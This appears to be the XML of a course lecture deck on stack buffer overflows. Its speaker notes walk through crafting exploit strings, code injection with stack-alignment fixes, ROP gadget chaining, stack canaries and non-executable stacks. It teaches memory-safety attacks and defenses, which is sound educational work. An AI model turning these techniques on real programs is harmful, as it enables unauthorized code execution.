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1" r:id="rId3"/>
    <p:sldId id="331" r:id="rId4"/>
    <p:sldId id="321" r:id="rId5"/>
    <p:sldId id="332" r:id="rId6"/>
    <p:sldId id="333" r:id="rId7"/>
    <p:sldId id="295" r:id="rId8"/>
    <p:sldId id="296" r:id="rId9"/>
    <p:sldId id="322" r:id="rId10"/>
    <p:sldId id="323" r:id="rId11"/>
    <p:sldId id="324" r:id="rId12"/>
    <p:sldId id="334" r:id="rId13"/>
    <p:sldId id="335" r:id="rId14"/>
    <p:sldId id="336" r:id="rId15"/>
    <p:sldId id="337" r:id="rId16"/>
    <p:sldId id="338" r:id="rId17"/>
    <p:sldId id="325" r:id="rId18"/>
    <p:sldId id="363" r:id="rId19"/>
    <p:sldId id="339" r:id="rId20"/>
    <p:sldId id="340" r:id="rId21"/>
    <p:sldId id="326" r:id="rId22"/>
    <p:sldId id="341" r:id="rId23"/>
    <p:sldId id="346" r:id="rId24"/>
    <p:sldId id="327" r:id="rId25"/>
    <p:sldId id="351" r:id="rId26"/>
    <p:sldId id="328" r:id="rId27"/>
    <p:sldId id="329" r:id="rId28"/>
    <p:sldId id="352" r:id="rId29"/>
    <p:sldId id="342" r:id="rId30"/>
    <p:sldId id="349" r:id="rId31"/>
    <p:sldId id="350" r:id="rId32"/>
    <p:sldId id="347" r:id="rId33"/>
    <p:sldId id="353" r:id="rId34"/>
    <p:sldId id="343" r:id="rId35"/>
    <p:sldId id="344" r:id="rId36"/>
    <p:sldId id="345" r:id="rId37"/>
    <p:sldId id="354" r:id="rId38"/>
    <p:sldId id="330" r:id="rId39"/>
    <p:sldId id="355" r:id="rId40"/>
    <p:sldId id="364" r:id="rId41"/>
    <p:sldId id="356" r:id="rId42"/>
    <p:sldId id="357" r:id="rId43"/>
    <p:sldId id="365" r:id="rId44"/>
    <p:sldId id="358" r:id="rId45"/>
    <p:sldId id="359" r:id="rId46"/>
    <p:sldId id="366" r:id="rId47"/>
    <p:sldId id="360" r:id="rId48"/>
    <p:sldId id="367" r:id="rId49"/>
    <p:sldId id="320" r:id="rId50"/>
    <p:sldId id="36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FF"/>
    <a:srgbClr val="F7C1EE"/>
    <a:srgbClr val="FFFF00"/>
    <a:srgbClr val="00FF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0" autoAdjust="0"/>
    <p:restoredTop sz="77030" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="111" d="100"/>
          <a:sy n="111" d="100"/>
        </p:scale>
        <p:origin x="296"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examples here are all x86, ARM is vulnerable, too. It’s just </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>easier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> to exploit x86 than it is ARM.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>Code injection is just as easy on ARM (even though return address is in register, the previous function’s return address is on the stack) but may not be able to get as many instructions in shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>ROP is harder because you cannot “return” into the middle of an existing instruction to repurpose its bytes – for a while, ROP was thought to be impossible on ARM, but proof-of-concept was demonstrated in 2009.</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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3440923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83 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 18 is a legal instruction, and it’s at an executable address. Best case scenario, we would’ve expected to be prompted to input a string) – but instead we get a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>segfault</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> while executing the instruction at address 0x400608 (calling puts).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>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Here’s why: When the function is finished, it adds 0x18 to the stack pointer, bringing it to 0x7FFFFFFFE008 and then pops off the “return address”, bringing the stack pointer to 0x7FFFFFFFE010, which is properly aligned on a 16-byte boundary. But 83 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 08 is “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>subl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $0x8, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”. Subtracting 0x18 from the stack pointer causes the stack pointer to no longer be aligned on a 16-byte boundary when making the puts call.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That’s not the only problem… because the “instruction” at 400600 specifies 32-bit math, -0x18 only gets sign-extended to 32 bits, leaving the upper 32 bits as 0.  -0x18 = 0xFFFFFFE8. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x7FFFFFFFE010 + 0xFFFFFFE8 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> 0x8000FFFFDFF8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>which will get truncated to 0x0000FFFFDFF8 because x86-64 has a 47-bit address space.</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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2818505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2010936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generate a string with the bytes EB 05 40 in the correct locations</a:t>
            </a:r>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209437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exploit-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>string.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> describes the bytes we want, but what we see as “48” is bytes 0x34 and 0x38. Instead, we want the actual byte 0x48.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>That’s where hex2raw.c comes into play. (There are many implementations out on the web; I’ve included my implementation in textbook-code/chap11.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note that the “filler” really doesn’t matter, as long as it has the requisite number of bytes. The new return address, however, does matter.</a:t>
            </a:r>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260700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went wrong?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;click&gt; 0x0A is the newline character, which is how gets() recognizes the end of user input – so while we overflowed the buffer, we didn’t inject the new return address. Here, it’s just filler, so it’ll be easy to replace. If 0x0A is ever part of an address or part of a line of assembly code that we’re injecting, we’ll have to find an alternative.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Depending on the particular vulnerability we’re attacking, we may need instead to be careful with 0x00, because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> will stop when it encounters 0x00.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;click&gt;</a:t>
            </a:r>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118222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an upward-growing stack (from lower addresses to higher addresses) does not prevent buffer overflow attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You’d put the shellcode’s address in the return address for the gets() call instead of for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>buffer_too_small</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() call.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B451C161-4068-4B77-B93E-241C90510927}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1453666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Commonly called “shellcode” because an attacker generally uses buffer overflow to start a command shell. I’m calling it “exploit code” because I’m not trying to get a shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In fact, some of the more infamous buffer overflow attacks were not about getting a command shell. Morris Worm, IM Wars, …</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024683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programmers create buffers large enough that most reasonable inputs will fit</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752565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bytes fits within the available space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This instruction </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> work; however, we’ll probably get a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0" err="1"/>
              <a:t>segfault</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> when caller() tries to print its message – the original return address (and our injected return address) are positioned so that after returning, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0" err="1"/>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> is divisible by 16 – in accordance with the ABI. If we put this return address where the stack pointer is, then after the return instruction pops the address, the stack pointer will then be misaligned.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>What we need to do is make sure everything is aligned properly when the address is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>popped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> off the stack.</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301462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that by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>pushing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> the address onto the stack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>6 bytes not only fits in the available space; it fits in the buffer!</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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235599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not to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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="205735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1162714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exploit string is read in, here is what our stack frame looks like. Some alignment space, the buffer, some more alignment space, the return address, and the caller’s stack frame.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After the exploit string is read in &lt;click&gt; we overwrote the return address with the address of the buffer, and the buffer contains some opcodes &lt;click&gt;.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Before returning &lt;click&gt; we deallocate the stack frame, and then we return &lt;click&gt;. This pops the “return address” off the stack and places it in the instruction pointer. &lt;click&gt; We now push 0x400648 (the original return address) on to the stack, repositioning the stack pointer so that it’s properly aligned for a return &lt;click&gt;</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874908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187341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fgets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> reads at most one less than the specified number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(“%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>s”) reads at most the specified number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don’t assume the system library has no vulnerabilities!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B451C161-4068-4B77-B93E-241C90510927}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3795272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Canary code in amber (including removing the canary from %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, to keep attacker from reading it)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Incidental change in buffer’s address in blue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Stack canaries may or may not be enabled by default. If in doubt, add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>“-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0" err="1"/>
              <a:t>fstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>-protector” to your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> arguments.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="263634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actual canary from one use (observed via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;click&gt; buffer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;click&gt; detected</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14912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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="374242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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3218597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go without saying, but do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> add “-z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0" err="1"/>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t>” to your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="0" dirty="0"/>
              <a:t> arguments!</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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2969285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37259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not to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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You might want to run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>memory_layout.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (your numbers may vary based on optimization, processor, and OS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>              Main stack frame at 0x7ffee3220960</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>      First called stack frame at 0x7ffee3220920</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>     Second called stack frame at 0x7ffee32208f0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Small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0x7fa1384006a0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Large </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>malloc'd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> variable stored at    0x10c9f3000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        Called function stored at    0x10c9dfd00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        Global variable stored at    0x10c9e0020</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        String constant stored at    0x10c9dffa4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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="260312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218638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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-equivalent: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xchg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ax,%ax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nopl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 0x0(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> %rax,1), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nopw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 0x0(%rax,%rax,1), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – used to align jump-targets to 16-byte boundaries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B451C161-4068-4B77-B93E-241C90510927}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="57586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 with the ret instruction from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>buffer_too_small</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;click&gt;“Return” to the first gadget: putting a 0 in %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, really, but it’ll zero-extend)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unwanted adjustment to stack pointer, but we can handle that by adding some filler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;click&gt;”Return” to next gadget: popping a value off of the stack, into %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rbp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We’ll pop 0x42 (‘B’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;click&gt;”Return” to next gadget: add the lower 8 bits of %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to the lower 8 bits of %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – 0x42+0x0 = 0x42</a:t>
            </a:r>
